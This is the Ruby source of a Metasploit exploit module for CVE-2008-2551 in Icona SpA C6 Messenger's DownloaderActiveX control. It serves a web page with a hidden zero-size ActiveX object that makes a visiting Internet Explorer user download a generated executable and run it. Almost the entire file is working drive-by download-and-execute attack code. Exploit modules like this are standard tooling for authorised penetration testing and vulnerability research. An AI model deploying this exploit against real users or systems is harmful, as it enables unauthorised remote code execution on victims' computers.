1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10
  include Msf::Exploit::EXE
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
17
        'Description' => %q{
18
          This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
19
          vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
20
          insecure control can be abused to download and execute arbitrary files in the context of
21
          the currently logged-on user.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit
26
          'juan vazquez' # metasploit module
27
        ],
28
        'References' => [
29
          [ 'CVE', '2008-2551' ],
30
          [ 'OSVDB', '45960' ],
31
          [ 'BID', '29519' ]
32
        ],
33
        'DefaultOptions' => {
34
          'EXITFUNC' => "none",
35
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
36
        },
37
        'Payload' => {
38
          'Space' => 2048,
39
          'StackAdjustment' => -3500,
40
        },
41
        'Platform' => 'win',
42
        'Targets' => [
43
          [ 'Automatic', {} ],
44
        ],
45
        'DisclosureDate' => '2008-06-03',
46
        'DefaultTarget' => 0,
47
        'Privileged' => false,
48
        'Notes' => {
49
          'Reliability' => UNKNOWN_RELIABILITY,
50
          'Stability' => UNKNOWN_STABILITY,
51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
        }
53
      )
54
    )
55
  end
56

57
  def autofilter
58
    false
59
  end
60

61
  def check_dependencies
62
    use_zlib
63
  end
64

65
  def on_request_uri(cli, request)
66
    # Only IEs are potential targets
67
    # "File Session" is used when the ActiveX tries to request the EXE
68
    agent = request.headers['User-Agent']
69
    if agent !~ /MSIE \d\.\d|File Session/
70
      print_error("Target not supported: #{agent}")
71
      return
72
    end
73

74
    payload_url = "#{get_uri(cli)}/#{@payload_rand}"
75

76
    if (request.uri.match(/#{@payload_rand}/))
77
      return if ((p = regenerate_payload(cli)) == nil)
78

79
      data = generate_payload_exe({ :code => p.encoded })
80
      print_status("Sending EXE payload")
81
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
82
      return
83
    end
84

85
    exe = rand_text_alpha(rand(5) + 1)
86

87
    content = %Q|
88
    <html>
89
      <object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
90
        <param name="propProgressBackground"  value="#bccee8">
91
        <param name="propTextBackground"  value="#f7f8fc">
92
        <param name="propBarColor"  value="#df0203">
93
        <param name="propTextColor"  value="#000000">
94
        <param name="propWidth"  value="0">
95
        <param name="propHeight"  value="0">
96
        <param name="propDownloadUrl"  value="#{payload_url}/#{exe}.exe">
97
        <param name="propPostDownloadAction"  value="run">
98
        <param name="propInstallCompleteUrl"  value="">
99
        <param name="propBrowserRedirectUrl"  value="">
100
        <param name="propVerbose"  value="0">
101
        <param name="propInterrupt"  value="0">
102
      </OBJECT>
103
    </html>
104
    |
105

106
    print_status("Sending #{self.name}")
107

108
    send_response_html(cli, content)
109

110
    handler(cli)
111
  end
112

113
  def exploit
114
    @payload_rand = rand_text_alpha(rand(5) + 5)
115
    super
116
  end
117
end
118

119